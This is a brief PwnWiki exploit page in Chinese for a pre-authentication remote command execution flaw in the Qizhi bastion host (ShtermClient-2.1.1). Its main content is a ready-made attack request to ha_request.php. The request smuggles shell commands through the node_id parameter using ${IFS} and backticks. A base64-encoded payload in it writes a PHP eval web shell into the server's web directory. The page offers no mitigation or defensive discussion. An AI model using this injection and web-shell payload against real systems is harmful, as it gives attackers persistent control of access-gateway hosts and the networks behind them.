齐治堡垒机前台远程命令执行漏洞

From PwnWiki
Revision as of 16:38, 5 July 2021 by Xc1ym (talk | contribs) (Created page with "==漏洞影响==")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Other languages:
Chinese • ‎中文(中国大陆)‎ • ‎中文(简体)‎ • ‎中文(繁體)‎

漏洞影响

ShtermClient-2.1.1

漏洞利用

漏洞利用

1.訪問 http://10.20.10.11/listener/cluster\_manage.php 返回OK;

2.訪問如下鏈接生成一句話木馬

https://10.20.10.10/ha_request.php?action=install&ipaddr=10.20.10.11&node_id=1${IFS}|`echo${IFS}"ZWNobyAnPD9waHAgQGV2YWwoJF9SRVFVRVNUW3NoZWxsXSk7Pz4nPj4vdmFyL3d3dy9zaHRlcm0vcmVzb3VyY2VzL3FyY29kZS9zaGVsbC5waHA="|base64${IFS}-d|bash`|${IFS}|echo${IFS}